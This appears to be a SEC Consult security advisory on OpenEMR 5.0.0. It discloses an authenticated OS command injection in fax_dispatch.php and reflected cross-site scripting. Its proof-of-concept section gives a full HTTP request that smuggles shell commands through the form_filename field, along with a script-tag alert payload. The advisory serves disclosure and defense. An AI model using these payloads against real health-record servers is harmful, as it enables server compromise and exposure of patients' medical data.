Vendor description:——————-"OpenEMR is the most popular open source electronic health records and medicalpractice management solution. ONC certified with international usage,OpenEMR's goal is a superior alternative to its proprietary counterparts."Source: http://www.open-emr.org/Business recommendation:————————By exploiting the vulnerability documented in this advisory, an attacker canfully compromise the web server which has OpenEMR installed. Potentiallysensitive health care and medical data might get exposed through this attack.SEC Consult recommends not to attach OpenEMR to the network until a thoroughsecurity review has been performed by security professionals and allidentified issues have been resolved.Vulnerability overview/description:———————————–1.OS Command InjectionAny OS commands can be injected by an authenticated attacker with any role.This is a serious vulnerability as the chance for the system to be fullycompromised is very high.2.Reflected Cross Site ScriptingThis vulnerability allows an attacker to inject malicious client sidescripting which will be executed in the browser of users if they visit themanipulated site. There are different issues affecting various components.The flash component has not been fixed yet as OpenEMR is looking for areplacement component.Proof of concept:—————–1.OS Command InjectionBelow is the detail of a HTTP request that needs to be sent to execute arbitraryOS commands through "fax_dispatch.php".“`URL : http://$DOMAIN/interface/fax/fax_dispatch.php?scan=xMETHOD : POSTPAYLOAD : form_save=1&form_cb_copy=1&form_cb_copy_type=1&form_images[]=x&form_filename='||<os-commands-here>||'&form_pid=1“`2.Reflected Cross Site ScriptingThe following URL parameters have been identified to be vulnerable againstreflected cross site scripting:The following payload shows a simple alert message box:a)“`URL : http://$DOMAIN/library/openflashchart/open-flash-chart.swfMETHOD : GETPAYLOAD : [PoC removed as no fix is available]“`b)“`URL :http://$DOMAIN/library/custom_template/ckeditor/_samples/assets/_posteddata.phpMETHOD : POSTPAYLOAD : <script>alert('xss');</script>=SENDF“`Vulnerable / tested versions:—————————–OpenEMR version 5.0.0 has been tested. This version was the latestat the time the security vulnerability was discovered.
